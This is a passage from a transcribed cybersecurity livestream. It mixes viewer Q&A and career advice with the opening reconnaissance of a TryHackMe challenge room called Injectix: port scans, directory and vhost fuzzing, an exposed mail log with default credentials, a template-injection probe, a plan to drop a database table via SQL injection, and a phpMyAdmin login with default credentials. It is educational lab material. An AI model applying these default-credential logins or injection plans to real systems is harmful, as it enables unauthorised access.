close to me. I can see the way you move, moving so close to me. I can hear the words you say, moving so close to me. So close to me.
Dumb microphone. All right. Now we are live. For some reason, OBS turned off the microphone when I went back to my face. But yo, what is up, everyone? Welcome to my live stream. My name is Tyler Ramsey. Want to just say, seriously, thank you for joining and hanging out with me today. Do want to let you know I am live right now on 3 different platforms, so you can join on whatever platform works best for you. But I am live right now on LinkedIn and YouTube, just under my name, Tyler Ramsey. And I am live on Twitch under the name Hack_Smarter. So Hack Smarter. So LinkedIn and YouTube, Tyler Ramsey. Twitch is Hack Smarter. I will do my best to keep my eye on the chat on all 3 of the platforms. If you have any comments, questions as we go through this, feel free to drop it there, and we will dive into things. Let me go ahead and get chat pulled up on this screen. Do also want to say shout out for the music. If you guys enjoy the music in the beginning, that is courtesy of the one and only Whitey Cracker, the original digital gangster. So I don't know if y'all know this. He has a pretty sweet YouTube channel. You may know him from some of his rap music that he makes, but he has these sweet DJ mixes on his YouTube channel. And I always like to bump this while I work. I like to throw it on for before we go live. So if you enjoyed the music, shout out to Whitey Cracker, the original digital gangster. That is where that music was coming from. But our plan, let me go back to share my screen. We're going to do the new Try Hack Me Challenge room Injectix. I wanted to knock out that room tonight. And this may be my last stream until Defcon. This week is pretty busy, and so truly this may be my last stream. I will have videos coming out on my YouTube channel, so follow me on YouTube. That's my main platform. I come out with videos at least twice a week over on YouTube, so I'll still have videos coming out, but this might be my last stream until I see you all in person at Defcon next week, which is insane. I will be landing in Vegas next Thursday. We'll be there until Monday. The one event I'll be at for sure is the Simply CyberCon meetup. I believe tickets are still available. So if you want to meet me and hang out with like me and Jerry and the entire Simply Cyber crew, would encourage you to attend that. Once again, it's completely free. All the details, you can find that on the Hack Smarter Discord or the Simply Cyber Discord. For Hack Smarter, if you just go to hacksmarter.org, Once again, hacksmarter.org. Click that link right on our homepage to join our Discord and look at one of the recent announcements. I have the invite link for that Simply Cyber meetup. But I will be there for the entire event. Would love to meet you. And also, when I'm at Defcon, guys, I'm just there to hang out. Like, we'll get into some hacker shenanigans. I usually stay up super late at Defcon. Like, I kid you not, I'll probably be up to like 3 or 4 in the morning each night, and you're welcome to hang out with me, knock out some CTFs, wander aimlessly around Vegas, and see where we end up. So if you're going to be at DEF CON, join me in Discord, let me know, and let's hang out, let's grab drinks, let's grab food when we are there. But looking over the chat before we dive into stuff, want to say on the YouTube side, a special hello. We got Ralph Andre, we got FedEx, we got Christopher Whitlock, we got Dario TG, we got Jacob Ripper, we got Prada Kumar, if I'm saying that right, we got Jimmy Barrios, we got Jitsec. What is up, everyone? And over on Twitch, we got Agent 57, Neospring, Doc G Money, and the one and only Nefos. Over on LinkedIn, I have people, but if you are watching on LinkedIn, I apologize. I can't see a lot of the comments. Oh, I actually do see a comment. So, Luai, I don't know if I'm saying your name correct, but you said, how would the playlist look like over there? Are they single videos about various things or some kind of past or search? Or are you talking about YouTube? Here, I'll show you real quick. For those of you who do not follow me on YouTube, that is my main platform. I encourage you to do so. If you do not subscribe to me there, if you just go to YouTube, whoops, if I can learn how to type. Geez, I'm really bad today. YouTube.com, Tyler Ramsby. Here is my YouTube channel. You can see I have over 400 videos. And if you go to my video tab, I have a bunch of videos, kind of in-depth walkthroughs teaching ethical hacking concepts. I have, various playlists from Pwn Labs and Portswigger and Thunderdome and Red Team Pathway and Try Hack Me stuff, just a bunch of content. So if you enjoy these live streams, that's what you can find on my YouTube channel, as well as shorter videos about careers, cybersecurity. If you do want to support what I do, you can do that in a few different ways. Over on YouTube, you can do a one-time gift via a super chat, or you can become a member. I have 2 member tier levels on YouTube, a $5 and I believe $10 a month tier. On Twitch, you can become a subscriber, and on LinkedIn, well, you can just hang out. I do want to be clear though, I don't believe in paywalls for anything that I do. So I want to make sure all the content I do, all the coaching I do, all the training I do is accessible to anyone and everyone, regardless of your place in the world or your financial status. So if you do support me via super chat or become a member, you don't get any type of special access to me or to my content. Everything I do, once again, no paywalls, free of charge, nothing is behind any financial blocker. So if you support me, that's just like, hey, a thank you, but I don't give you a special gift. Besides, you get to be part of the party. So really do appreciate when you guys do that. Looking over at chat, we got EJ Nixon. What is up, my friend? I don't think I've seen you for a while, or I just missed your name, but good to have you here. Zach said, hey, Tyler, I got my first SOC interview. Amazing, dude. Good luck with that. What up, Master Crossing? And Matt said, what are you going to do tonight? We're going to do the newest Try Hack Me machine, challenge machine. And Dario said, which machine do you recommend to test your pen tester skills? So yeah, guys, like if you're new to my stream, before we dive into like the walkthrough, I just do a short AMA with questions in the chat. So Dario, I actually do have a recommendation for that. If you go to Try Hack Me, and we'll see if we can find it. I'm trying to think of what it's even called, but I think it is in one of the paths. So if you go to Learn on Try Hack Me, I believe, well, let's see if I can find it. Maybe it's Learning Paths. See, I've done quite a few of these. Is it in the Pentest Plus path? Let me just look at this path and see if I can find it. What do we got here? Oh. Maybe not here. I'll keep looking. There is a machine on Try Hack Me that's meant to like simulate an actual pen test, and I did a whole live stream on it. I kind of did a pen testing workshop on it. It's gonna come with a lot of stuff, isn't it? Does anyone know what room I'm talking about? Man, I don't think I'm gonna be able to find it. It's like a realistic, let's just type realistic. I don't know if that's gonna come up. Oh man, I don't think I'm gonna be able to find it. Maybe it's modules. Let me see what modules we have here. I thought there were like... Here, let me glance through these. We'll see if I can eventually find it. Oh, maybe it's offensive pen testing is where it's at. Let me check. Oh, relevant. Dude, Doc G Money. Doc G Money is the real MVP. You are right, Doc G Money. It is relevant. That's the one I was looking for. Here it is. So this is the one I recommend. This relevant one. Oh, I didn't realize it was created by the mayor. He is the guy over at TCM Security. Cool. But relevant, I have a video on my YouTube channel where I did like a pen testing workshop and I treated this like an actual pen test. But you are given a scope of work and the goal is to find all the vulnerabilities, not just how to get root. So this would be the machine I recommend. I will drop it in the link to in each one of the chats so you all can see it. Thank you again, Doc G Money. That was on the tip of my tongue and I just couldn't think of what it was called. And DI, if I'm saying that right, said, bro, are there any method to bypass AV? I tried a lot of them, but without any result. So AV bypasses, what's tough about an AV bypass is it truly is a cat and mouse game. So like I have a few videos on my channel on how to bypass AV and all the comments are people complaining, oh, you lied to me, it doesn't work. Well, that's not how AV bypasses work. So I go on this rant occasionally, but the moment I publish a YouTube video on how to bypass AV, the AV vendors see you bypassing AV and they quickly patch it, right? So like any type of public AV bypass you find is likely going to be burned rather quickly. So I have some private AV bypassing methods that I have not shared with all of you because I know the moment I share it, it's going to get detected. So obviously I'm not going to share those. But if you watch some of my videos on how to bypass AV, it should give you at least an idea of some things to try that you might be able to bypass it yourself. So you can start with some of my videos. There's other excellent videos out there, as well as things like Maldev Academy. If you get a sub over to them, they would give you some more real coding ways of bypassing AV. But that's a tough thing. That's a tough thing about AV bypasses. A lot of what you find will not work because the moment it's published, it's going to get burned. That's just how it works. Paul said, hello, Tyler. I've been watching your videos a lot the past few months since I decided to dive into cybersecurity. Keep up the great content. Never had the time to join a stream of yours. Well, dude, welcome to the party, pal, as they say in Simply Cyber. Paul, thank you, dude, for taking the time to drop in chat, leaving those kind words. I don't know what time it is for you, but hopefully you have some time to hang out for the full stream. What up, Pingu XOR over on Twitch? It is going well, my friend. Even better now that you're here. We are going to dive into things. All the platforms look like they're streaming good. So if you're new to my stream, when I live stream, this is kind of hanging out with you all. And then occasionally throughout the live stream, we'll make like the standalone YouTube video. So it's kind of like you're on a live TV show. What I'm going to do is I'm going to hit the record button over in OBS and I'm going to do a full welcome because what you are about to see is what's going to become the standalone YouTube video on my YouTube channel. But also as we're doing this, I'll still answer questions. So if you have questions about pen testing, careers, or just what I'm doing in front of me, feel free to ask. I'm going to do my best as we go through this machine to explain everything kind of down to a basic level because I know many of you are at different points of your journey and I want this to be beneficial to you. We are going to do the newest challenge machine from TryHackMe called Injectix, and I'll explain this when I do the intro. But to be upfront, generally when I go into these rooms, I do it completely blind. It's the first time I ever see the room and I kind of stumble through it with you. I do want to be very honest. Injectix is one that I've kind of done. Like I don't even have the first flag yet, but I did the initial enumeration and have a pretty good idea of how to get the first flag. I'm just not there yet. I started doing it on Friday when it released and just got busy and haven't gone back to it. So this isn't fully blind, but I also haven't fully completed the machine. So we'll dive into it and dig into it. I'll answer one more question real quick. What up, A-Rider? Good to have you here. Pingu said, what's your advice on how to get into system security and reverse engineering? Well, my advice probably isn't the great because I don't do a lot of that stuff. Like I do some very minor reverse engineering when I do mobile app pen testing. I do mobile app pen testing for Android and iOS apps. And especially on the Android side, often I decompile the app and I'll do some code review that way. But for reverse engineering and system security, one resource I think would be helpful, even though I don't think it's the primary purpose, would be something like Maldev Academy, right? Teaching some more coding type things, all these different modules, understanding these things will help with reverse engineering. But for reverse engineering, knowing some of those tools to rip things apart will be helpful. Like for mobile apps, I use, yeah, you're right, I do use JADX for Android decompile, you got it. And I use like MobSF for some of it. But Pingu, this is what I recommend. I actually want to do this myself because what I like about Maldev Academy, the content seems like incredibly high quality from what I see people talk about. And for $500, you can get lifetime access, which is just amazing. It's not a subscription thing. I can pay a one-time fee and I get access to everything. So this is what I want to do, is this lifetime access when I get to it. All right, I said I was going to do one more question, but there's another good question over here. Fasky Live said, how would you start from scratch with Hack the Box? I mean, I can use the guided mode, but I am afraid that I don't really learn something with that. Where can I learn needed basics? Do you have recommendations? Hey, Fasky Live, that's a question I get asked all the time. So I think what I'm going to do is I'm going to turn your question right now on the spot here. Let me go ahead and authenticate. I'm going to turn your question right here on the spot into a standalone video for YouTube. So give me just a second while I log into Hack the Box. Maybe. Give me a second. There we go. All right, I need to do MFA. And that's what I do, guys. The cool thing about live streaming is all my standalone videos on my YouTube channel are quite literally informed by your questions. So if you have questions, I will answer them, especially if you ask them on stream, because I will answer them on stream. But if it's one I get asked all the time, I'll make a whole separate standalone video so I can point people to that for the future. So let me get a drink of water. We're going to make a standalone video about getting started with Hack the Box. And here's the other thing, guys. I don't do video editing. Like, I just one take these videos and hope they turn out okay. I don't have time to edit videos besides some minor editing, so I just wing it every single time. Obviously, I did not plan this at all, but I'll give you my live thoughts and we'll make a video about it. So here we go. Hey, what is up, everyone? One of the most common questions I get is, hey, Tyler, how do I get started with a platform like Hack the Box? Matter of fact, I'm live on stream right now making this standalone video, and I want to give a special shout out to Fasky Live over on Twitch. Fasky Live asked this question. How would you start from scratch with Hack the Box? I mean, I can use the guided mode, but I'm afraid that I don't really learn something with that. Where can I learn needed basics? Do you have recommendations? Now, if you ask 10 different people this question, you are going to get 20 different answers. There's a lot of places that you can start as far as recommendations go, but let me give you some of my recommendations from a few different platforms that I would recommend. So because you asked the question, starting with Hack the Box, let me go ahead and share my screen. Here we are on the main Hack the Box platform, and the place that I would recommend is, well, where Hack the Box recommends, is these starting point machines. These are really incredible in the way they teach and help you do your first couple of machines. They have different tiers. So we have tier 0, the key is a strong foundation. Tier 1, you need to walk before you can run. And finally, tier 2, don't forget to contemplate. Now, here's the learning outcome. Like, let's just dive into this and show you what you'll be doing. In the first tier, you will gain essential skills in the world of cybersecurity pen testing. You'll start by learning how to connect to various services such as FTP, SMB, Telnet, RSync, and RDP anonymously. Next, you'll discover the power of Nmap, a valuable tool for identifying open ports on target systems, allowing you to assess their vulnerabilities. Lastly, you'll explore connecting to a MongoDB server, adding a valuable layer to your pen testing knowledge. This tier will lay a strong foundation for your journey into the realm of cybersecurity. Now, what is cool about each one of these machines is they have very much a guided approach. So you can even see we have different steps we're supposed to follow. As we knock them out, it'll open up the next task. But the biggest thing is if you just go through these tasks and you do not take notes, you are not going to learn. one of the things I think many people regret when they get into cybersecurity or pen testing is they don't start right away with taking notes. We just think by doing these things, we're going to learn it. But here's the thing, cybersecurity and pen testing in particular is a massive field. There is so much to learn, so many things to poke at, and really your notes serve in some ways as your second brain, your second mind. So I encourage you to take notes. You can use Notion, you can use Cherry Tree, you can use OneNote, heck, you can use notepad.exe for all I care. It's less important what app you use to take your notes, and just more important that you're taking notes as you go through this. I have a whole nother video on YouTube called How to Take Notes for Hackers, or a Hacker's Guide to Taking Notes. You can YouTube it, you can find it, search for it, you'll be able to find it, where I go through my personal note-taking process as I go through these rooms. So depending on your experience level, I think these starting point machines would be a great place to start. Work through each one of these tiers, and then start with the easy machines on Hack the Box. Now the cool thing about machines on Hack the Box, I'll show you some of these. If we go to Hack the Box, I'll go to Retire Machine, and let's just pick a random easy machine that I haven't done so I don't spoil anything. So here's one, Headless. The cool thing about these machines is we have two different modes. So with every easy machine on Hack the Box, you can choose an adventure mode, which is more like a black box pen test. You're not given information ahead of time, and it's just you, your VM, your computer, your skills. Can you get to both of the flags? On the other hand, if you get stuck with something, the cool thing is you can go to guided mode. Guided mode turns it a little more into like a try hack me machine, or what you encountered on the starting point machines, where it guides you through the process without giving you the answer, which I think is good. It points you in the right direction, but still requires you to do some of the digging and the learning yourself. And finally, each one of these machines also has an official walkthrough and video walkthrough, which this isn't bad to use. Like when I was first getting into pen testing and doing things like Hack the Box and Try Hack Me, I always thought if I looked at a walkthrough, I lost. I failed on that machine, but that is not true, guys. Like if you watch me on stream, you see me use walkthroughs all the time. The way I approach a Hack the Box machine is first I try doing it in adventure mode. Then when, not if, but when I get stuck, because I usually get stuck, I switch over to guided mode to see if I can get unstuck. If I'm still stuck at that point, I will look at the official walkthrough, but only until I'm no longer stuck, and then I'll dive into the machine. Guys, you only lose if you don't learn something from going through the machine. So if you have to use a walkthrough, awesome. I use them all the time, use them when I was studying for the OSCP, and it works. You only lose if you don't take notes. So when you look at a walkthrough, just make sure you document the one thing or the two things that you were missing, add it to your notes, so when you discover a similar attack vector next time, you'll have an idea of what to start with. Now, you mentioned that you are starting completely from scratch, so I'm not sure your full background, but if you're completely new to IT, cybersecurity, networking, things like that, the other platform I'd recommend for starting with is Try Hack Me. Now, there's always this debate, which platform is better, Hack the Box versus Try Hack Me. I use both of them pretty extensively. Try Hack Me is where I first got my start, and I'm still active on Try Hack Me. I'm actually going to showcase a Try Hack Me machine on stream. You can see my ranking on here. I've even created some official Try Hack Me machines. So I love Try Hack Me. And if you go over to the Learn tab here on Try Hack Me, and a lot of this as well is completely free. You don't need a sub to go through this stuff. We have all these different learning paths. So if you're brand new, this is what I would recommend. I would recommend doing the pre-security learning path. These are all hands-on labs, hands-on modules, take notes as you go. After you do the pre-security learning path, do the intro to cybersecurity learning path. After intro to cybersecurity, do the junior pen tester path. And after junior pen tester, I would do the, did I miss it? Oh, here it is. It was the first one. One of the full paths I completed, the red teaming path. That's a lot more advanced. But once you get to like the junior pen tester path, you are ready to do Hack the Box machines alongside of it. So do Try Hack Me challenge machines and Hack the Box machines. Junior pen tester, you will have the skills to go through the machine and at least understand the walkthroughs when you get stuck. So hey, hopefully you found this helpful. And for those of you who have a different idea of how to get started with doing CTFs and pen testing and learning some of these boxes, let me know in the comments your thoughts. What is your favorite platform? What is your favorite learning path? What are some things I maybe missed that you want to let other people know about? Once again, let me know in the comments. Would love to hear from you. And thank you for the question over on live stream. Once again, thank you Fasky Live for the question. And thank you all for watching this video. I will see you guys in the next one. Boom. So that is how I make my standalone video, guys. I literally just wing it and give you my thoughts live and in real time. The benefit of that is I don't have to waste my time editing the videos. It's raw, unedited, but I've done it enough times that usually it comes out okay. And A Rider, thank you for dropping that link. Looking over at chat, A Rider said, I've been having fun with Perm X on Hack the Box and been spun in circles a few times. Oh, sweet, I'll have to check out that machine. Nida says, I just do a Hack the Box every 2 days and alternate between the platforms. That's a good way to do it. Watch your channel really help me with my notes. Thank you, Malware Combat. That's so awesome you do them live. That's the only way I can do it. So actually, someone messaged me on Discord and they were like, Tyler, bro, you got 2 YouTube channels. You're always releasing videos. How do you balance it all with having a wife and 2 kids? Because obviously I prioritize them over all this. And the way I do it is, generally speaking, I just have one night. I'll stream one night live. And during that one night, that's when I make all my videos. And because I don't waste my time editing my videos, they're like ready to be published. And I just schedule them to be published, which is how I come out with videos constantly. It all just comes from one live stream when I'm hanging out on here. Dude, Tony, amazing. Tony over on YouTube said, I got my first CVE on Silver Peas after watching your CVE video. And look at that. You didn't even have to pay for an overpriced boot camp or give me a bunch of money for my private coaching program. You took what I gave you, you ran with it, and you got a CV. Honestly, congratulations. Let's check out your CV. Is it published? I'm going to pull it up. Let's look at what it is. All right, here it is. In Silver Peas Core, a user can create new events and add them to their calendar. Additionally, users can invite others from the same domain, including administrators, to these events. A standard user can inject a cross-site scripting payload into the title and description fields. It's a French application, if anyone's wondering on the language. When creating an event, and then add the administrator or any user to the event. When the invited user views their own profile, the payloads will be executed on their side, even if they do not click on the event. Dude, awesome work. Congratulations. If anyone's wondering what video he's talking about, if you go over to the amazing YouTube platform, and there's actually a few videos I have. If you just type Tyler Ramsby CVEs, you should be able to find some of them. Here's the one he's likely referring to. I found 8 CVEs in 2 weeks, and you can too. I also did a live stream with Jerry Ozier on Simply Cyber on finding CVEs. I have another CVE I found here, and I led an entire workshop for NYC chapter of Racist Cyber on finding and exploiting CVEs. They just spelled my last name wrong, but that's okay. So like, if you want to learn how to find CVEs, these are videos I have released. Everything's free of charge as usual. And the difference between me and the other silly influencers on YouTube who tell you how to do this, like when I search for, I won't call out anyone by name, but when I search for CVE videos, it's all these influencers talking about CVEs who have never freaking found a CVE a day in their life. So at least when you watch my content, I have 9 CVEs under my belt, and people have watched these videos and found their own CVEs. So like, it really does work. I'm not just making silly influencer videos. This is real life security research helping you find your first 0-day or CVE. Thank you for sharing that again, Tony. That's awesome. Okay, let me go ahead and get this machine started up, just so we don't have to wait for it to boot. Once I start the standalone video, we'll get this started, and then we'll see if we can knock this out tonight. It is about 10 p.m. my time. I have to wake up somewhat early to bring my daughter to a day camp, so I don't want to stay up super late, but we'll see if we can finish this whole thing. Like I said before, I've already done some of the enumeration, but I'll redo all of it to show you guys the process. All right, let's go ahead and start recording a second standalone video for YouTube on this machine. And because this machine just came out, I want to record this video and like drop the video tonight as well. So we'll see if we can turn it over real quick. All right. Let's do this. Injectix. It's hard to say. The Injectix. All right, here we go. Hey, what is up, everyone? Welcome back to another video. In this video, we're going to dive into the newer challenge machine on TryHackMe called Injectix. Now, I do want to be clear. Usually when I go through these videos on my channel, as you've seen, I have like 400 plus of these. I go into them completely blind. I pick a random machine. I try Hack Me or Hack the Box or Pwn Labs or PortSwigger or Hacker Hub, you name your platform, and I dive into it without any research or prep ahead of time, just to give you the full raw methodology of going into one of these machines to make it a little more realistic. Now, I want to be very honest. I did begin doing some initial enumeration on this machine on Friday when it came out, but that's it. I don't even have the first flag. I was able to bypass an initial login, and I'll show you that full process, but I'll go all the way back to the beginning. I'll redo the enumeration I did when I was doing this on Friday and still give you my full thought process, my full methodology, and explain the things I'm doing as I go. And like I said, I don't even have flag 1 or flag 2 on this. I'm pretty sure I know how to at least get to flag 1 from my poking around it on Friday. I just ran out of time from what I was doing, had to switch over to something else, but wanted to dive back into it and finish it. So without any further ado, let me go ahead and share my screen. Once again, this is the latest challenge machine on TryHackMe at the time of this recording. If you go to the TryHackMe dashboard, it is right here, Injectix by 1337 RCE. I launched the machine. I am on the TryHackMe VPN. So the first thing that we are going to do is grab the IP address, and we'll go back over to our terminal. And let's go ahead and do sudo vim etc host. Etc host, for those of you who might be new to Linux, this is the way we resolve domain names to IP addresses. So instead of remembering the IP address every time, we can do it this way. So we'll drop down here and we'll paste in our IP like so, and we will call it Injectix, hopefully I'm saying that right, .thm, and then we will exit out, save it, quit, and now let's see if we can ping it. And we can, so that's a good place to start. We can ping the machine, and I'll also make my text just a little bit bigger for you guys so you can see it a little bit easier. We'll change this. We'll just do like maybe 18, won't be too big, and you'll still be able to see it okay. All right, there we go. So what I like to do when I'm doing a CTF is I begin with RustScan, and I pass the results of RustScan over to Nmap, and I'll show you how I do this. We'll do RustScan. You may have to install this, but the GitHub has really good information on how to install it. It's literally, you can download the binary and just put it in your path. RustScan-A, I believe, and Injectix-THM. And then we want to pass it over to Nmap, and that's what this dash does. So we're going to hit it with RustScan. And then it's going to say, hey, whatever ports you find open with RustScan, run the -A flag on it with Nmap. And if you're new to Nmap, the -A flag just means like throw all the enumeration scans at it. So enumerate whatever ports are open and see what information we are able to find. So we will go ahead and do that. The other thing we're going to do is get our notes set up. So let's jump over to our notes. I use Notion for my notes. You can see here are my different labs I've worked through. I have a bunch more labs in this, but I've changed my note taking too many times. I started with OneNote, then I went to Cherry Tree, and now I'm on Notion, and so far I enjoy Notion the most. But we'll go to on-prem, and we will just make a new page for Injectix THM. We'll go ahead and make it full width. I don't know why it doesn't do it by default, and we will make it full screen. So here we have our Injectix note. Let's jump back over to our terminal, and we can see that our scan is complete. So what I like to do is I like to take my scan results, if my machine would go a little bit faster, and I drop this first into this page. We'll change this over to bash. There we go. And I like to separate out the ports that we are working with. The other thing I want to do is change this, if I can. Can I do this? Wrap code. I like to wrap code instead of stretching out the code. So we know we have 2 ports open. We have 22, which is going to be SSH. Generally speaking, SSH is not going to be the way in, but you never know. I've seen it a few times on boxes where SSH actually is the way in, especially with the recent SSH CVE, but it's likely we're going to be doing some web app pen testing. If we look over at the room itself, I think it even tells us that. Can you utilize your web pen testing skills to safeguard the event from any injection attack? So we know we're doing injection attacks. We know we're doing web app pen testing. So SSH is probably only going to be helpful once we get access to some credentials. Now, what I like to do is I like to make separate tabs for each one of these ports. And as I enumerate those ports, I'll keep it to those pages. So we'll add a page inside of here. We'll call it SSH. We'll drop it there. We'll do that. We'll make it full screen, or full width rather. And we have SSH done, and we'll do the same thing for port 80 for HTTP. And as we enumerate each one of these ports, we'll keep all of our notes to that page so we can quickly see what we have done, what ports are open. For those of you who are studying for the OSCP, I highly recommend following this method. It worked really well for me on the OSCP and helped me not miss anything in my enumeration. Neflis asked over on Twitch, how are you finding Parrot OS compared to Kali? You know, I find them very similar. I don't even really have a preference for one over the other. I used to use Kali exclusively, and now I've been using Parrot. There's a few things I customize in Parrot to make it more like what I want, but really not too much. Like the thing I really liked about Kali for when I was doing CTFs is the fact that it would show the IP in the top right corner. Parrot doesn't do that by default, so you can actually see the command here. I just made a cron job that takes my ton.o IP, which is from the VPN, puts in home Tyler IP.txt, and the cron job just throws it up here every minute or so. So as I update to different VPNs, my IP updates. It's literally the one thing I miss from Kali, and I ghetto rigged my own solution to work on Parrot. But and I enjoy Parrot, I enjoy Kali, both are good. You can install the same tools, and I had issues in the past with Parrot, but I think it was more user error. I've been using Parrot exclusively for a while and have had very few minor issues with Parrot, so it's gone well. But here we go. We have port 80 open, and what I like to do, once again, a helpful tool for those of you studying for the OSCP, is make a to-do list before you begin enumerating. A machine or an exam like the OSCP is notorious for having rabbit holes that you might fall into and a bunch of different ports that are open. So the best thing you can do to avoid falling into rabbit holes is before you go into a machine and you're an hour in and you're distracted and you're frustrated and you can't think straight, make your to-do list ahead of time. So then when you get stuck, you can very easily look at your to-do list and see, okay, here are some things I haven't checked yet. Let me dive into those things. So let's go ahead and do that. We'll say, here is our to-do list, right? What we want to do is we'll do directory brute forcing. We will do vhost fuzzing. We will check like source code. We can check robots.txt, and we'll just check website functionality. See if there's any login forms input that we're able to mess around with. So let's go ahead and get our scans ready. Oh, the other thing I like to do is, like, you can use nuclei as well. I use that in pentest often, kind of an overkill for a CTF, so we won't put that on there. I think this is a pretty good checklist to begin with for a web app. So let's go ahead and get our terminal pulled up, and we'll just call this dir search. That's what I like to use. So here is our dir search, super easy to use, dir search-u, http injectix.thm. It has a default word list that honestly works pretty well, so we don't even have to pass it a word list. And we'll go ahead and get dir search started. Let's also do our vhost fuzzing. And the way we do that is you can use ffuff, but I have a custom tool I wrote because I always forgot the syntax of ffuff. If you want to download this tool, you can do so from my GitHub. If we jump over to the Try Hack Me room, if you just go to github.com, Tenebrain93, this is my personal GitHub, and I have a folder called Offensive Security where I just drop a bunch of standalone scripts that I find helpful. And one of these standalone scripts is the vhost fuzzer. Literally, it's just using ffuff. I just always forget the syntax, right? And so I kind of duct tape this script together, and it helps you remember the syntax of vhost fuzzing. I used to use GoBuster for vhost fuzzing, but I didn't find it accurate, so that's why I do it this way. So we can just go home, Tyler, GitHub tools, offensive security, vhost fuzzer. We can see the syntax, and it says we need to pass a domain, wordless, URL, and FS filter. So let's go ahead and do that. Our domain is injectix.thm. Our wordless, we can use something like dirbuster, directory, list 2.3 medium. Our URL is http injectix.thm. Our FS filter, we don't know what that is yet, so I always just start with 1, and we'll get all the results, and you can see our size of a non-existent vhost is 6588, so we'll change our FS filter to 6588, and there we go. We are doing our vhost fuzzing. We have dir search going, which dir search has already found a bunch of things that we are going to want to look at and dig into. So let's go ahead and get our web app tool open. Now you can use Burp, you can use OWASP Zap. When I'm on stream, I like to use Kato. And the reason I use Kato is, well, I just enjoy it. I like the way it looks, and it's a lot more accessible for people. Burp Pro has what's called Intruder, so you can fuzz login forms and such, but it's only available in Burp Pro. With Kato, even the free version of Kato, they don't rate limit you on anything, so you're good to go. It does look like we have an update available, so I want to go ahead and update my Kato instance. We'll download the Debian package here. That is making my eyes bleed. Wow, the white screen does not work for my sensitive hacker eyes. Let's close out our white screen. We can close out Kato real quick. Let's jump over to our downloads. We'll do sudo apt remove Kato. And now we'll do sudo. Here, I'll go back to the screen. Sudo dpkg-i for install. And I think it was 39, right? Yep, there we go. We'll go ahead and get Kato installed. And beautiful. And now with our updated Kato, let's open it back up. And we are on 0.39, so we should be good to go. We will start our instance up. And let's go ahead and create a project. And we'll call our project Injectix. We'll create, intercept, open this up, use the built-in Chromium browser so I don't forget to turn off Burp and such, or not Burp, proxy. And let's check out our website. What are we working with? All right, welcome to the Injectix of 2024. Catch all the action and track the performance of your favorite athletes and teams. We have a leaderboard right here with some information. It looks like it's adding up their medals. And we have some links that go nowhere, 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 nowhere. We have events, nowhere. That's all the same stuff. But we do have a login page. So we have login. Let's go ahead and just document that for our notes. Let me open up Flameshot. That is a tool that I use for taking screenshots. We'll click that. And we'll just say, we'll get the URL in here and just copy all of this down. Copy that, jump back over to our notes here, and we will just say login form. All right, kind of keep that. If anyone, if a Notion dev ever watches my stuff, please let it freaking automatically align to the left. I hate having to do that. All right, Notion, sincerely. Jump back to this. We also have a login as admin form, which, you know, might be interesting as well. So let's grab that. If I could type form right. Oh my gosh, are you serious, Poster Syndrome? Poster Syndrome said new Notion Boost extension can automatically align to the left. I'm gonna have to check that out. Thanks for letting me know. I need a drink of water now too. All right, so we have an admin login form, we have a regular login form, and that is about it here. We'll come back and mess with these login forms, but before we do that, let's go ahead. Our vhost isn't doing anything, but we have a bunch of things here. So let's just test out some of this. We have a composer.json and a composer.lock, so we can check that stuff out. All right, so this would actually be a finding if we were doing an actual pen test on this. We have what is called software version disclosure. It would be an informational finding, but often you can take an informational finding as you enumerate the app and combine it with other things. So this is what this tells me. Twig is a templating language for PHP, I think. Pretty sure I have my details correct there. Let's drop this here. All right? So we have Twig 2.4.0. It's always something we could check for vulnerabilities, but Twig is one of those languages that if we can figure out a way to input data into a form, Twig is one of the most common languages that you'll see when we're looking at server-side template injection. Server-side template injection would allow us to get RCE and other things on the engine. If we just go for Twig, you can see it right here. Some ways that we can test Twig. This is a very easy way to test it in a real-world pen test, a bug bounty, or on a CTF, 7x7, and see if it equals 49. So, just one thing to keep in mind, we already have a minor finding if this was an actual pen test that we were doing. We have a version disclosure, and we want to keep this in mind. If we can figure out a way to do input data, we might be able to use server-side template injection to read files and to even execute commands. The other one was composer.lock, which will, lock the dependencies for, I think, Node.js. So we also have some other versions of things here. Nothing super interesting, just version information that we could come back to and enumerate. So we'll keep that in mind. And we have this right here. We have Twig again, the flexible, fast, and secure template language, or PHP. So we have more information about Twig in the version that's being used here, but nothing really new that's being added, but we'll just kind of keep that in mind. If we go back to dir search, what else do we have? We have these things, which we're not going to have access to, it looks like. We have a mail.log, so we can jump over to mail.log. And here we go. Hey, we have an actual email from dev@injectus.thm to superadmin. So right away, we have username enumeration. We now have two valid users. We know there's a dev and there's a superadmin. So hey, before heading off on holidays, I wanted to update you on the latest changes to the website. I have implemented several enhancements and enabled a special service called Injectix. This service continually monitors the database to ensure it remains in a stable state. To add an extra layer of safety, I have configured the service to automatically insert default credentials into the user's table if it is ever deleted or becomes corrupted. So this tells us if we can find SQL injection, we can probably drop the user's table, because if it does, it's going to default to these creds. All right, so let's grab a screenshot of this, and we'll highlight those couple of things. All right, we'll go all the way over. I don't know why it's being slow. There we go. And so once again, a few things I want to highlight. We have username enumeration. We have some default credentials. They're not going to work yet because it says if something happens to the database table, right? We know the name of a table, so that's more enumeration, and if that table is ever deleted, right? So let's go ahead and copy that, jump back over to our notes. We'll call it credentials, username, enumeration, table information. So we have that. So this is what we can do. We can be like users. We have dev@injectix.thm, and we have superadmin@injectix.thm. And we can even add their passwords to it as well once we figure out a way to drop their database. Superadmin dev password 123. All right, there we go. We have some credential information there. We need to figure out a way to drop the database is what that tells me. Let's look at dir search. We also see we have phpMyAdmin installed. We can kind of check, whoops, I controlled C instead of control shift C to copy. We can check that out. Oops. All right, so we have more version information disclosure. Let's grab a screenshot of that. And we will highlight that for our notes. Now this tells us a few things. One is, of course, phpMyAdmin is in use, so there should be a login page for phpMyAdmin. But also for phpMyAdmin, we also know PHP is on the back end. We also kind of found that out from Twig. But I believe phpMyAdmin uses MySQL as the default database. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. So those would be the two languages. So I'm going to say .9.5 vulnerabilities. I think it's also going to have a login screen if we just go out to phpMyAdmin. And we do, and anytime you have a login screen like this, you just want to test default credentials, so we can do that. I think it's like root and password or something. Root. I think it's root and password. Oh, password is root. Root and root. Got it. So always worth trying those low-hanging bugs. I've actually had it on pen test, not web apps, but like when on an internal pen test, and I get access to like networking gear. Oh, and then we have even more information. We know for sure it's MySQL on the back end because we have that error message. But anyways, when I'm like an internal pen test and I discover networking gear and things like that, you'd be surprised how often I can use default creds and I have full access to the switch or the router, whatever is on there, or printers as well, is where I get that at. All right, let me look at chat because I know I'm missing stuff here. Imposter Syndrome said, what are your default extensions for dir search? I mean, it's honestly whatever is built into dir search. I don't modify anything. So it 